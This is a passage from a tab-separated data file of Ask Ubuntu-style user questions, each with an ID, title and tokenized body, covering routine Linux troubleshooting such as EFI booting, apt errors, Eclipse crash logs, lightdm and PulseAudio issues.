/dev/sdb1 to `` bios_grub '' , /dev/sdb2 as `` / '' ( ext4 ) , /dev/sdb3 as swap , and /dev/sdb4 as `` /home '' . [ note : fearing that possibly elilo did not recognize ext4 , i switched /dev/sdb2 to ext2 and re-insalled ] the net result was that the install appeared to trash the /dev/sdb1 partition so that it was not readable by anything . i re-formated /dev/sdb1 as fat32 and set the boot flag . i repeated the install ignoring the messages about no bios_grub partition . after several attempts to get grub2 to work , i switched to elilo . i downloaded the most recent version and copied it ( elilo-3.14-ia64.efi ) to /dev/sdb1/efi/boot/bootx64.efi . ( the bios boot loader did not recognize it either as elilo-3.14.ia64.efi or as elilo.efi . based on the advice in one of the web-pages i found , i renamed it to bootx64.efi . this worked . ) in that same directory ( /efi/boot ) , i copied the file pointed to the link in /dev/sdb2/vmlinuz to /efi/boot/vmlinuz , and the file pointed to the link in /dev/sdb2/initrd.img to /efi/boot/initrd.img . i created an elilo.conf file as follows : timeout=5000 prompt default=linux-boot image=vmlinuz label=linux-boot read-only initrd=initrd.img root=/dev/sdb2 the /efi/boot directory contains 4 files : bootx64.efi elilo.conf vmlinuz initrd.img when i power-cycle the computer and force the boot menu , drive2 shows up as an efi bootable drive . when i select it , i get the elilo prompt . pressing , it appears to load the kernal ( i have tried it with verbose=5 , and there is a long string of messages with the final one a command line to load the kernel and a series of several dots that fly by ) then the screen goes blank , and it reboots the computer . [ note : i have also tried substituting the uuid as found in the /etc/fstab of the installed system for the root directory . this had no effect . ] this is a brief synopsis of several nights of fiddling with this . i would deeply appreciate any help you can give .
184960	using ubuntu-x-swat ppa solved my problem . can i be sure the commands i ran are safe ?	are these commands safe ? i was getting logged out by ubuntu , and these commands saved me : sudo add-apt-repository ppa : ubuntu-x-swat/x-updates sudo apt-get update sudo apt-get upgrade
184963	can i buy any usb microphone and have it work with ubuntu ?	i want to be able to connect 2 to 4 microphone to my laptop , and record sound using audacity . it only has one microphone input , and it has two usb inputs . after searching on the web , it seems there are devices that i can plug multiple microphones into , which in turn connect by usb . however , i 'm not confident that if i buy such a device that ubuntu will recognize it . i 'm also not willing to spend days fighting with drivers and configurations . if it is n't as easy as installing an additional package or two , or maybe one or two lines at the command prompt , then this is n't worth doing . how can i determine if i will be able to use a sound mixer device before i buy it ? ( note that pretty much no shop where these are sold is going to let me hook it up to my laptop to test , as that involves taking it out of the packaging . )
184964	web rdp not working in 11.10	i am not able to connect to the remote machine from ubuntu 11.10 machine using web rdp . the following are the details . java vendor : oracle corporation java version : 1.7.0_07 ive host : xxx.xxx.com run level:0 , read timeout:90000 applet is signed and trusted webrdp version : 1.0.8.16 , 2011-04-14 10:34 attempting to obtain the license from the application jar . obtained the license from the application jar . keyboard : ibm101 i have removed the actual host name from the above details the error message on a pop up window is application error unsatisfiedlinkerror unable to load library 'libx11 ' : liblibx11.so : can not open shared object file : no such file or directory . this error happens soon after applet loads . i am supposed to get a webrdp screen with logo then a windows login screen for the remote machine . ( this is working fine in linux mint ) anyone has experienced this problem ? any solutions ?
184967	how do i test the translations i am making for 12.04 ?	i want to download latest translations from launchpad of particular language for ubuntu 12.04 . how to do that ? i 've been adding translations to marathi language . but the version in synaptic is not updated with latest translations . how to download latest version of language from launchpad or synaptic ?
184968	ca n't get ubuntu to install	i have a brand new ssd in my laptop . i 'm trying to boot ubuntu from a cd i downloaded . i burned it on my mac and i feel something is wrong with the cd . it is just a standard cd . any idea what might be wrong with my install ?
184977	eclipse does n't start on ubuntu	i am facing one issue from many days . sometime eclipse working fine but sometime eclipse does n't start . may be some issue in workspace , when i change my workspace then it is working fine . but why it does n't start on my old workspace . i also try this solution 1 , but no any success . when i start eclipse it looking like this but after some time it will looking like this i found error from /workspace/.metadata/.log file ! session 2012-09-07 11:26:18.718 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - eclipse.buildid=m20110210-1200 java.version=1.6.0_24 java.vendor=sun microsystems inc. bootloader constants : os=linux , arch=x86 , ws=gtk , nl=en_in framework arguments : -help command-line arguments : -os linux -ws gtk -arch x86 -help ! entry org.eclipse.core.resources 2 10035 2012-09-07 11:26:19.993 ! message the workspace exited with unsaved changes in the previous session ; refreshing workspace to recover changes . ! entry org.tigris.subversion.clientadapter.javahl 1 0 2012-09-07 11:26:21.269 ! message failed to load javahl library . these are the errors that were encountered : no libsvnjavahl-1 in java.library.path no svnjavahl-1 in java.library.path no svnjavahl in java.library.path java.library.path = /usr/lib/jvm/java-6-openjdk/jre/lib/i386/client : /usr/lib/jvm/java-6-openjdk/jre/lib/i386 : :/usr/java/packages/lib/i386 : /usr/lib/jni : /lib : /usr/lib ! entry org.eclipse.osgi 2 0 2012-09-07 11:26:28.502 ! message while loading class `` com.android.ide.eclipse.adt.internal.project.androidclasspathcontainerinitializer '' , thread `` thread [ org.eclipse.jdt.internal.ui.text.javareconciler,1 , main ] '' timed out waiting ( 5000ms ) for thread `` thread [ main,6 , main ] '' to finish starting bundle `` com.android.ide.eclipse.adt_20.0.3.v201208082019-427395 [ 2 ] '' . to avoid deadlock , thread `` thread [ org.eclipse.jdt.internal.ui.text.javareconciler,1 , main ] '' is proceeding but `` com.android.ide.eclipse.adt.internal.project.androidclasspathcontainerinitializer '' may not be fully initialized . ! stack 0 org.osgi.framework.bundleexception : state change in progress for bundle `` reference : file : plugins/com.android.ide.eclipse.adt_20.0.3.v201208082019-427395.jar '' by thread `` main '' . at org.eclipse.osgi.framework.internal.core.abstractbundle.beginstatechange ( abstractbundle.java:1077 ) at org.eclipse.osgi.framework.internal.core.abstractbundle.start ( abstractbundle.java:282 ) at org.eclipse.osgi.framework.util.secureaction.start ( secureaction.java:417 ) at org.eclipse.osgi.internal.loader.bundleloader.setlazytrigger ( bundleloader.java:265 ) at org.eclipse.core.runtime.internal.adaptor.eclipselazystarter.postfindlocalclass ( eclipselazystarter.java:106 ) at org.eclipse.osgi.baseadaptor.loader.classpathmanager.findlocalclass ( classpathmanager.java:453 ) at org.eclipse.osgi.internal.baseadaptor.defaultclassloader.findlocalclass ( defaultclassloader.java:216 ) at org.eclipse.osgi.internal.loader.bundleloader.findlocalclass ( bundleloader.java:393 ) at org.eclipse.osgi.internal.loader.bundleloader.findclassinternal ( bundleloader.java:469 ) at org.eclipse.osgi.internal.loader.bundleloader.findclass ( bundleloader.java:422 ) at org.eclipse.osgi.internal.loader.bundleloader.findclass ( bundleloader.java:410 ) at org.eclipse.osgi.internal.baseadaptor.defaultclassloader.loadclass ( defaultclassloader.java:107 ) at java.lang.classloader.loadclass ( classloader.java:266 ) at org.eclipse.osgi.internal.loader.bundleloader.loadclass ( bundleloader.java:338 ) at org.eclipse.osgi.framework.internal.core.bundlehost.loadclass ( bundlehost.java:232 ) at org.eclipse.osgi.framework.internal.core.abstractbundle.loadclass ( abstractbundle.java:1197 ) at org.eclipse.core.internal.registry.osgi.registrystrategyosgi.createexecutableextension ( registrystrategyosgi.java:174 ) at org.eclipse.core.internal.registry.extensionregistry.createexecutableextension ( extensionregistry.java:904 ) at org.eclipse.core.internal.registry.configurationelement.createexecutableextension ( configurationelement.java:243 ) at org.eclipse.core.internal.registry.configurationelementhandle.createexecutableextension ( configurationelementhandle.java:55 ) at org.eclipse.jdt.core.javacore.computeclasspathcontainerinitializer ( javacore.java:2752 ) at org.eclipse.jdt.core.javacore.getclasspathcontainerinitializer ( javacore.java:2728 ) at org.eclipse.jdt.internal.core.javamodelmanager.initializecontainer ( javamodelmanager.java:2688 ) at org.eclipse.jdt.internal.core.javamodelmanager.getclasspathcontainer ( javamodelmanager.java:1850 ) at org.eclipse.jdt.core.javacore.getclasspathcontainer ( javacore.java:2705 ) at org.eclipse.jdt.internal.core.javaproject.resolveclasspath ( javaproject.java:2645 ) at org.eclipse.jdt.internal.core.javaproject.resolveclasspath ( javaproject.java:2783 ) at org.eclipse.jdt.internal.core.javaproject.getresolvedclasspath ( javaproject.java:1915 ) at org.eclipse.jdt.internal.core.javaproject.buildstructure ( javaproject.java:440 ) at org.eclipse.jdt.internal.core.openable.generateinfos ( openable.java:258 ) at org.eclipse.jdt.internal.core.javaelement.openwhenclosed ( javaelement.java:515 ) at org.eclipse.jdt.internal.core.javaelement.getelementinfo ( javaelement.java:252 ) at org.eclipse.jdt.internal.core.javaelement.getelementinfo ( javaelement.java:238 ) at org.eclipse.jdt.internal.core.javaproject.getjavaprojectelementinfo ( javaproject.java:1603 ) at org.eclipse.jdt.internal.core.javaproject.newnamelookup ( javaproject.java:2282 ) at org.eclipse.jdt.internal.core.searchableenvironment. < init > ( searchableenvironment.java:57 ) at org.eclipse.jdt.internal.core.searchableenvironment. < init > ( searchableenvironment.java:64 ) at org.eclipse.jdt.internal.core.cancelablenameenvironment. < init > ( cancelablenameenvironment.java:26 ) at org.eclipse.jdt.internal.core.compilationunitproblemfinder.process ( compilationunitproblemfinder.java:162 ) at org.eclipse.jdt.internal.core.compilationunitproblemfinder.process ( compilationunitproblemfinder.java:255 ) at org.eclipse.jdt.internal.core.reconcileworkingcopyoperation.makeconsistent ( reconcileworkingcopyoperation.java:190 ) at org.eclipse.jdt.internal.core.reconcileworkingcopyoperation.executeoperation ( reconcileworkingcopyoperation.java:89 ) at org.eclipse.jdt.internal.core.javamodeloperation.run ( javamodeloperation.java:728 ) at org.eclipse.jdt.internal.core.javamodeloperation.runoperation ( javamodeloperation.java:788 ) at org.eclipse.jdt.internal.core.compilationunit.reconcile ( compilationunit.java:1244 ) at org.eclipse.jdt.internal.ui.text.java.javareconcilingstrategy.reconcile ( javareconcilingstrategy.java:126 ) at org.eclipse.jdt.internal.ui.text.java.javareconcilingstrategy.access $ 0 ( javareconcilingstrategy.java:108 ) at org.eclipse.jdt.internal.ui.text.java.javareconcilingstrategy $ 1.run ( javareconcilingstrategy.java:89 ) at org.eclipse.core.runtime.saferunner.run ( saferunner.java:42 ) at org.eclipse.jdt.internal.ui.text.java.javareconcilingstrategy.reconcile ( javareconcilingstrategy.java:87 ) at org.eclipse.jdt.internal.ui.text.java.javareconcilingstrategy.initialreconcile ( javareconcilingstrategy.java:178 ) at org.eclipse.jdt.internal.ui.text.compositereconcilingstrategy.initialreconcile ( compositereconcilingstrategy.java:114 ) at org.eclipse.jdt.internal.ui.text.javacompositereconcilingstrategy.initialreconcile ( javacompositereconcilingstrategy.java:133 ) at org.eclipse.jface.text.reconciler.monoreconciler.initialprocess ( monoreconciler.java:105 ) at org.eclipse.jdt.internal.ui.text.javareconciler.initialprocess ( javareconciler.java:398 ) at org.eclipse.jface.text.reconciler.abstractreconciler $ backgroundthread.run ( abstractreconciler.java:173 ) caused by : org.eclipse.osgi.framework.internal.core.abstractbundle $ bundlestatusexception ... 56 more root exception : org.eclipse.osgi.framework.internal.core.abstractbundle $ bundlestatusexception at org.eclipse.osgi.framework.internal.core.abstractbundle.beginstatechange ( abstractbundle.java:1077 ) at org.eclipse.osgi.framework.internal.core.abstractbundle.start ( abstractbundle.java:282 ) at org.eclipse.osgi.framework.util.secureaction.start ( secureaction.java:417 ) at org.eclipse.osgi.internal.loader.bundleloader.setlazytrigger ( bundleloader.java:265 ) at org.eclipse.core.runtime.internal.adaptor.eclipselazystarter.postfindlocalclass ( eclipselazystarter.java:106 ) at org.eclipse.osgi.baseadaptor.loader.classpathmanager.findlocalclass ( classpathmanager.java:453 ) at org.eclipse.osgi.internal.baseadaptor.defaultclassloader.findlocalclass ( defaultclassloader.java:216 ) at org.eclipse.osgi.internal.loader.bundleloader.findlocalclass ( bundleloader.java:393 ) at org.eclipse.osgi.internal.loader.bundleloader.findclassinternal ( bundleloader.java:469 ) at org.eclipse.osgi.internal.loader.bundleloader.findclass ( bundleloader.java:422 ) at org.eclipse.osgi.internal.loader.bundleloader.findclass ( bundleloader.java:410 ) at org.eclipse.osgi.internal.baseadaptor.defaultclassloader.loadclass ( defaultclassloader.java:107 ) at java.lang.classloader.loadclass ( classloader.java:266 ) at org.eclipse.osgi.internal.loader.bundleloader.loadclass ( bundleloader.java:338 ) at org.eclipse.osgi.framework.internal.core.bundlehost.loadclass ( bundlehost.java:232 ) at org.eclipse.osgi.framework.internal.core.abstractbundle.loadclass ( abstractbundle.java:1197 ) at org.eclipse.core.internal.registry.osgi.registrystrategyosgi.createexecutableextension ( registrystrategyosgi.java:174 ) at org.eclipse.core.internal.registry.extensionregistry.createexecutableextension ( extensionregistry.java:904 ) at org.eclipse.core.internal.registry.configurationelement.createexecutableextension ( configurationelement.java:243 ) at org.eclipse.core.internal.registry.configurationelementhandle.createexecutableextension ( configurationelementhandle.java:55 ) at org.eclipse.jdt.core.javacore.computeclasspathcontainerinitializer ( javacore.java:2752 ) at org.eclipse.jdt.core.javacore.getclasspathcontainerinitializer ( javacore.java:2728 ) at org.eclipse.jdt.internal.core.javamodelmanager.initializecontainer ( javamodelmanager.java:2688 ) at org.eclipse.jdt.internal.core.javamodelmanager.getclasspathcontainer ( javamodelmanager.java:1850 ) at org.eclipse.jdt.core.javacore.getclasspathcontainer ( javacore.java:2705 ) at org.eclipse.jdt.internal.core.javaproject.resolveclasspath ( javaproject.java:2645 ) at org.eclipse.jdt.internal.core.javaproject.resolveclasspath ( javaproject.java:2783 ) at org.eclipse.jdt.internal.core.javaproject.getresolvedclasspath ( javaproject.java:1915 ) at org.eclipse.jdt.internal.core.javaproject.buildstructure ( javaproject.java:440 ) at org.eclipse.jdt.internal.core.openable.generateinfos ( openable.java:258 ) at org.eclipse.jdt.internal.core.javaelement.openwhenclosed ( javaelement.java:515 ) at org.eclipse.jdt.internal.core.javaelement.getelementinfo ( javaelement.java:252 ) at org.eclipse.jdt.internal.core.javaelement.getelementinfo ( javaelement.java:238 ) at org.eclipse.jdt.internal.core.javaproject.getjavaprojectelementinfo ( javaproject.java:1603 ) at org.eclipse.jdt.internal.core.javaproject.newnamelookup ( javaproject.java:2282 ) at org.eclipse.jdt.internal.core.searchableenvironment. < init > ( searchableenvironment.java:57 ) at org.eclipse.jdt.internal.core.searchableenvironment. < init > ( searchableenvironment.java:64 ) at org.eclipse.jdt.internal.core.cancelablenameenvironment. < init > ( cancelablenameenvironment.java:26 ) at org.eclipse.jdt.internal.core.compilationunitproblemfinder.process ( compilationunitproblemfinder.java:162 ) at org.eclipse.jdt.internal.core.compilationunitproblemfinder.process ( compilationunitproblemfinder.java:255 ) at org.eclipse.jdt.internal.core.reconcileworkingcopyoperation.makeconsistent ( reconcileworkingcopyoperation.java:190 ) at org.eclipse.jdt.internal.core.reconcileworkingcopyoperation.executeoperation ( reconcileworkingcopyoperation.java:89 ) at org.eclipse.jdt.internal.core.javamodeloperation.run ( javamodeloperation.java:728 ) at org.eclipse.jdt.internal.core.javamodeloperation.runoperation ( javamodeloperation.java:788 ) at org.eclipse.jdt.internal.core.compilationunit.reconcile ( compilationunit.java:1244 ) at org.eclipse.jdt.internal.ui.text.java.javareconcilingstrategy.reconcile ( javareconcilingstrategy.java:126 ) at org.eclipse.jdt.internal.ui.text.java.javareconcilingstrategy.access $ 0 ( javareconcilingstrategy.java:108 ) at org.eclipse.jdt.internal.ui.text.java.javareconcilingstrategy $ 1.run ( javareconcilingstrategy.java:89 ) at org.eclipse.core.runtime.saferunner.run ( saferunner.java:42 ) at org.eclipse.jdt.internal.ui.text.java.javareconcilingstrategy.reconcile ( javareconcilingstrategy.java:87 ) at org.eclipse.jdt.internal.ui.text.java.javareconcilingstrategy.initialreconcile ( javareconcilingstrategy.java:178 ) at org.eclipse.jdt.internal.ui.text.compositereconcilingstrategy.initialreconcile ( compositereconcilingstrategy.java:114 ) at org.eclipse.jdt.internal.ui.text.javacompositereconcilingstrategy.initialreconcile ( javacompositereconcilingstrategy.java:133 ) at org.eclipse.jface.text.reconciler.monoreconciler.initialprocess ( monoreconciler.java:105 ) at org.eclipse.jdt.internal.ui.text.javareconciler.initialprocess ( javareconciler.java:398 ) at org.eclipse.jface.text.reconciler.abstractreconciler $ backgroundthread.run ( abstractreconciler.java:173 )
184979	ca n't install packages using apt-get install or software center	i installed recently in my personal computer 12.04 . when a try to install some software ( dropbox or chromium per example ) from the ubuntu software center or when i try to install some package using the terminal ( sudo apt-get install guake for example ) , i find an issue . there is some problem with the packages list . what i can do ? i tried to run sudo apt-get update , but the issue persist .
184983	12.04 : how do i change background color of main menu in gnome fallback ?	when running in gnome fallback mode ( gnome classic ) in ubuntu 12.04 , i added the main menu to the bottom panel , but i have a problem with the customization of its colors . it is like the old gnome 2 menu that combined applications and places into one . by default with the ambiance theme , the menu 's background is white when it should match the background of the panel itself . when using the applications/places menu that is enabled by default , it has the proper background matching the panel as it should . is it possible to customize the main menu 's background color in gnome fallback or is the setting not there ?
184985	how to share wired internet through ad-hoc wi-fi connection via a laptop ?	is there a way i can share my wired internet connection through my ad-hoc wi-fi connection , like i could do in windows with connectify ? i am using ubuntu studio 12.04 .
184986	are there any command to see how processes are working ?	i 'm very new to ubuntu . if i do this sort of command say : cp file1 file2 the shell creates a child process and that child process will call cp , which in turn call exec system call of operating system . are there any command to visualize this process from my terminal ?
184992	running unity 2d in xubuntu 12.04	i 'm trying to run unity 2d in xubuntu , i installed the packages but when i try to run it i get [ fatal ] settings schema 'com.canonical.unity ' is not installed how can i get it to run ? i 'd like to install as little stuff as possible .
185002	problem accessing second hard disk with squeezebox server	i have recently re-purposed my old desktop pc as a 'server ' running ubuntu lts 12.04 . i want to use the machine as my primary squeezebox server in place of my htpc macmini ( to reduce the strain on the macmini ) . i managed to install squeezebox server without to much difficulty and added music folder of my 'home ' folder to the library - all good and it worked fine . i then realised that the disk was almost completely full and decided to install a second drive in the machine and move the music to that so that the primary drive could be used for other things . i installed a 1.5tb drive in the machine and formatted it as one partition with ext4 using ubuntu 's 'disk utility ' app . i then moved all my music to a 'music ' folder on the new drive using nautilus . the problem is that i can not add the new drive/folder in the lms web settings . the old music folder was located at : /home//music ( this can be found fine by clicking browse in lms web settings ) when i go to the settings page at 'basic settings ' , 'media folders ' and click browse , i can not find the new drive - it is not showing up . the new drive is located at : /media/mediadisk i can access the new drive without any problems using nautilus , or by navigating through the terminal , but if i use the 'browse ' feature from within lms web settings the folder can not be found . ( the 'mediadisk ' drive is not showing up in the 'media ' folder ) i have even tried pasting : /media/mediadisk/music into the 'media folders ' field but nothing works ! i must confess i am pretty new to linux but if i was to guess i would say it was a problem with the permissions , right ? can anyone help ?
185007	pulseaudio equalizer does n't survive neither suspend nor hibernate	first time ubuntu boots up it 's fine . i can listen to the music and the sound is equalized . then if i suspend the pc or let it hibernate then , after i have woken it up , the sound becomes plain . if in pulseaudio volume control panel in playback tab before suspend/resume i could choose the output , say , for rhythmbox , between my sound card and something called 'ladspa plugin multiband eq on my card ' then after it this choice disappears at all . pulseaudio eq control panel is still reachable but i believe it operates only eq configuration not the module itself . what can be wrong ? is it pulseaudio server which behaves incorrectly or the plugin itself ? by the way , from syslog : sep 7 11:42:32 music pulseaudio [ 2496 ] : [ alsa-sink ] alsa-util.c : got pollnval from alsa sep 7 11:42:32 music pulseaudio [ 2496 ] : [ alsa-sink ] alsa-util.c : could not recover from pollerr|pollnval|pollhup with snd_pcm_prepare ( ) : no such device sep 7 11:42:32 music pulseaudio [ 2496 ] : [ pulseaudio ] module-console-kit.c : getunixuser ( ) call failed : org.freedesktop.dbus.error.unknownmethod : method `` getunixuser '' with signature `` '' on interface `` org.freedesktop.consolekit.session '' does n't exist sep 7 11:42:32 pulseaudio [ 2496 ] : last message repeated 2 times
185013	out of screen window	windows that i drag half way out of the screen return when i click on another application . how do i keep them off of the screen ( desktop ) ? thanks .
185014	my mouse wheel skips half the page	i have the `` mac osx lion '' theme installed on my ubuntu 12.04.1 computer . i have this glitch with my scroll wheel , that when i try to scroll down the page , l it skips about 1/2 of it . what can i do to fix this ?
185019	how to fetch a image from online ( http ) and make it as a wallpaper using ubuntu terminal	i need to change the background of my desktop in ubuntu 12 . 04 with a command in terminal , in order to make a script with bash . does anyone know how to do it ? but i want the image from internet ... i know if i use local image would like this : gsettings set org.gnome.desktop.background picture-uri file : ///home/icorner/wallpaper/curr.jpg but if i use something like this wont work gsettings set org.gnome.desktop.background picture-uri where picture-uri is url of some image on internet . thanks & regards , yan fachmi
185021	how to remove ( or hide ) chat status icons from messaging menu	i would know how to remove or hide in ubuntu 12.04 the chat status section ( available , away , busy , invisible and offline ) from messaging menu as i am not using any instant messenger . i do not want to remove the entire menu , just that section . thank you very much and best regards ! !
185025	proftpd - can i quickly add virtual users in webmin/virtualmin ?	i have successfully setup proftpd with virtual users and i can add more users quite easily from the command line by editing /etc/proftpd/ftpd.passwd . however , i need my colleagues to be able to quickly add users without having to login as root , bring up 'vim ' and so forth . is there any easy tool for managing/adding virtual ftp users ?
185026	firewall wont let me through but i can copy the files using another machine	very new to ubuntu so please bear with me i am building a server using ubuntu 12.04 the firewall will not let me through to do any apt-get 's or updates can i copy the files needed and put them on the server and point the sourses file to that location to do the updates that way ? if i can what files do i copy
185030	creating an alternate install cd with pre installed users	i want to create my own customized ubuntu derivative and this question already gave me a very good start . my requirements are quite specific i want to roll out a cd with set of users who are supposed to run them ( root , admin , guest ) pre-installed with their passwords already set installation not asking for creating users on booting or during os installation autologin to guest user is this even possible ? thanks to the community in advance : )
185031	which database to use for quickly and pygtk	i 'm writing application using quickly pygtk and glade . this application should have database connection ( such as mysql ) for reading and writing data from the local or outsourcing machine \ server . however , in my machine there is mysql installed , but when releasing the app it sould be installed on another ubuntu machine , which may not have mysql and moreover not the same database with the required database name and structure ... . so my questions are : is it a good choice using mysql as database 1.2 if not what is ? is it posible to embeding mysql or other database program during the installation from ubuntu software center ? 2.2 if it 's posible : hwo ( any tutorial ? ) where to store secure data outside the mysql ( or whatever ) for conecting the database every time a user launch the application
185034	how to correctly set permisions for all subfolders and files	i am following the guide to install tinyos on ubuntu 12.04 i have done up to step 3 , but i am not sure if i have done the step 3 correctly . because by doing the step 4 i get the permission error : saeid @ saeid-satellite-c660 : ~ $ tos-install-jni /usr/bin/tos-install-jni : 13 : [ : = : unexpected operator installing 32-bit java jni code in /usr/lib/jvm/java-6-openjdk-i386/jre/lib/i386 ... install : can not create regular file `/usr/lib/jvm/java-6-openjdk-i386/jre/lib/i386/libgetenv.so ' : permission denied can you please tell me what would be the actual commands for step 3 ? what i have to replace with following lines ? : /opt/tinyos-2.x files : chown -r /opt/tinyos-2.x change the permissions on any serial ( /dev/ttys ) , usb ( /dev/tts/usb , /dev/ttyusb ) , or parallel ( /dev/parport ) devices you are going to use : chmod 666 /dev/ i mean how would you do those steps in your ubuntu ?
185037	find a file with exact name without using wildcard	i have been using ubuntu for abuot 2 weeks and and still frustrated with simple file operations . i want to find a file called 9.jpg . every internal command and 3rd party program i have tried , gives me 99.jpg , 999.jpg , `` lovepotion number9.jpg '' and a zillion other similar ones . how do you search for an exact file name without wildcards ? this is only my most recent frustration . i 'm obviously missing something basic . good tutorial anywhere ?
185039	how do i remove the last connected users from the lightdm greeter list	with gdm3 , i was able to remove the last connected users from the list by removing the file '/var/log/consolekit/history' with lightdm , the last users appears even when : removing /var/log/consolekit/history removing /var/lib/lightdm/.cache/unity-greeter/state where does lightdm store this list ? edit : it seems like it 's using the content from the last command . then purging the content of the file /var/log/wtmp is sufficient to remove any previously connected user from the list : # > /var/log/wtmp but , after doing this , i have the unwanted side effect that users loging in via lightdm does n't appears at all in this list . i must say that i 'm in a enterprise network environment using nis . edit2 : well , it seems that lightdm uses wtmp to display recent network users list , but does not update it . so , lightdm will show a network user only if it logged in in another fashion ( ssh , login ) , like i did on this computer before . cf : https : //bugs.launchpad.net/lightdm/+bug/871070 http : //bugs.debian.org/cgi-bin/bugreport.cgi ? bug=648604 edit3 : i just added the following line to the file /etc/pam.d/lightdm to force lightdm to store users in wtmp : session optional pam_lastlog.so silent
185043	unity does not start and log in automatically	at some point after i created extra users , fiddled with my auto login setting and that of the login keyring , i found that unity does not start automatically on boot and i have to enter my password . sometimes it does start but drops back out to ask me my password . since this is a personal computer can i skip all that ?
185044	why wont ubuntu recognize rogers lte rocket stick 330u sierra wireless modem ?	i tried to plug the rocket stick into the usb slot , and ubuntu does not recognize that there is anything in the drive . i plug in a standard usb thumbdrive and it is recognized right away . are there any applications to help me open the rogers folders to see the files , and maybe connect to the internet using said rocket stick 330u ? i 've been searching for this answer for almost a week now , seems no one knows how to get the net using this piece of technology .
185045	mouse click events are delayed when moving the cursor in xubuntu 12.04	i am trying out live xubuntu on my samsung n150 ( netbook , similar to eeepc ) . so far everything seems perfect , except for this one thing . when i am clicking the mouse while moving the cursour , the click event is delayed . this is extremely annoying when i try to to move windows , because i end up clicking the window behind the window i am trying to move and thereby changing focus . this goes for all applications . i.e selecting text is difficult . there is no lag in the cursor movement , just the click event . the click event is registered with the new mouse position , not the one when the mouse was clicked . i tried searching for the problem , but all the other cases where either kind of different , or had no solution . edit : after testing some more , here are some more information . the click does n't occur until i stop moving the cursor . if i move the cursor smoothly around , the click never gets through . i have ubuntu netbook remix 10.04 installed , and have no problems with the mouse there . edit2 : once i connected a usb-mouse , the problem dissappeared . dragging now works perfectly with both the track pad and the usb mouse . i will update once i have installed xubuntu and figured out if this is a persistant problem . edit3 : i have installed , and the problem is still there . it dissappears when i have a second mouse connected however , and after i resume from suspend . my solution for now , is just to keep the dongle connected all the time . edit4 : it 's been a while since i had this problem , and i 've stopped using the machine . i think it was an annoying problem , however , and i will do what i can to help solve it . since somebody asked : the machine has 2 gib of memory .
185051	update manager failed to download repository information	when i try to get updates , update manager shows that message : w : failed to fetch http : //ppa.launchpad.net/lorenzo-carbonell/atareao/ubuntu/dists/precise/main/source/sources 404 not found w : failed to fetch http : //ppa.launchpad.net/lorenzo-carbonell/atareao/ubuntu/dists/precise/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead .
185052	how to enable onboard in lightdm-gtk-greeter ?	unity-greeter crashes , and constantly respawns , not letting me in . so , i configured auto login but that wo n't start anything except unity session . i changed the lightdm.conf file to run xubuntu but unity still shows up . if i create a new user , it will start in xubuntu just fine . i deleted my .conf xfce prefs and that fixed nothing . i can at least get in to the gtk login greeter but then the onboard keyboard does not show up . if i could get the onboard keyboard in the gtk greeter , i would be super happy . the onboard keyboard shows up in the unity greeter just fine . but not the gtk greeter . i do n't have a solid keyboard because it is a tablet . so , i need the onboard in the greeter .
185054	will there be a boot selection screen after uninstalling wubi installed ubuntu ?	i 'd like to know if uninstalling ubuntu via `` programs and features '' on windows 7 or vista would also remove the boot entries that had once been created during installation , and would it thereafter prevent the os selection screen at windows startup ( usually after bios ) which asks to select either from windows or ubuntu ? i installed through wubi on windows 7 sp1 .
185055	how to fix terminal in ubuntu ?	i 'm stuck . ubuntu 11.10 was working fine . i tried to create a desktop icon that i could click and run a terminal command . ( not launch a program , just run a command to set something ) . i do n't know what i did , but now i ca n't get terminal to run at all . i ca n't click on terminal in the launchbar or use alt-f2 . if i try , i see a very quick box open and close . if i switch to another user , terminal does open and work fine ? i ca n't even get it to open gconfig or x-term or x-term manager ? does anyone know how to reset terminal without being able to get into terminal ? i tried going into synaptic and removing terminal , and then re-installing it , but it did n't change the behavior at all , it still wo n't open .
185056	install ubuntu on samsung series 5 ultra ssd	i was wondering if anyone had had any luck with installing ubuntu 12.04 on samsung series 5 ultra ? the thing is that i want to install root on the ssd for fast boot ( along with windows7 ) ... if anyone has done this please tell me how .
185058	ubuntu installation - partitions not found	i replaced windows with ubuntu , but when i log in into ubuntu , the drives ( partitions ) are not to be seen , and there are important files on my drives . windows was installed in c : \ . i need the other drives so that i could recover the files .
185061	lightweight desktop environments	hi i was thinking about try a lightweight desktop for my ubuntu . i like unity but am just curious to see how well they work . but i do n't know where to start , theres l and x ubuntu , whats the difference 's between the two ? , i read x is not very lightweight and l is very ugly . my pc is of reasonable spec so which distro 's are not just for underpowered machines ? can any one suggest any others to try ?
185062	how do i convert .ani file into ubuntu native extension ?	i have a cursor pack for windows which i would like to use with ubuntu . but i see the cursor directory of ubuntu has extensionless files . can i convert .ani animations to ubuntu native cursors ?
185064	unable to find /home/user	i am not able to boot ubuntu . i am facing four problems in serial and i am stating each one below : 1 ) when i switch on my computer the ubuntu boots than at starting it says : the disk drive for /boot/uboot is not ready yet or not present wait or press s to skip or m to add manually . 2 ) after pressing s then i go to login , then after login using my password , my home screen pops a message : could not update iceauthority file . /home/ user/.iceauthority 3 ) then i press enter , then again an error message pops saying : there is a problem with the configuration server . ( /usr/lib/libgconf 2-4/ifconf-sanity-check -2 exited with status 256 ) 4 ) then after pressing enter , i get another error message nautilus could not create the following required folders : /home/user/desktop , /home/user/.nautilus these are the four problems that i am getting . please do help me . i also saw some solutions on the net and tried them but i am not able to solve them so thought that it is better to ask at this forum , waiting for your valuable response . the solutions that i tried so far from the text console with ctrl+alt+f1 : sudo chmod 755/etc/gconf/gconf.xml.system mkdir -p /etc/gconf/gconf.xml.system chmod 755 /etc/gconf/gconf.xml.system su root chmod 777 /tmp chmod 777 /tmp/* reboot what 's wrong with my system ?
185069	pulling multiple alternatives from a variable in a case condition	i 'd like to use variable as condition in case statement . something similar to : # ! /bin/sh allowed_services=tomcat6|james ; case $ 1 in $ allowed_services ) service $ 1 restart ; ; * ) echo `` unsupported argument '' ; ; esac this does n't work . when script is started with tomcat6 argument for exapmle , it outpoots `` unsuported argument '' message . but when case condition is hardcoded it works ok : case $ 1 in tomcat6|james ) service $ 1 restart ; ; * ) echo `` unsupported argument '' ; ; esac is it possible to use variables in this case ?
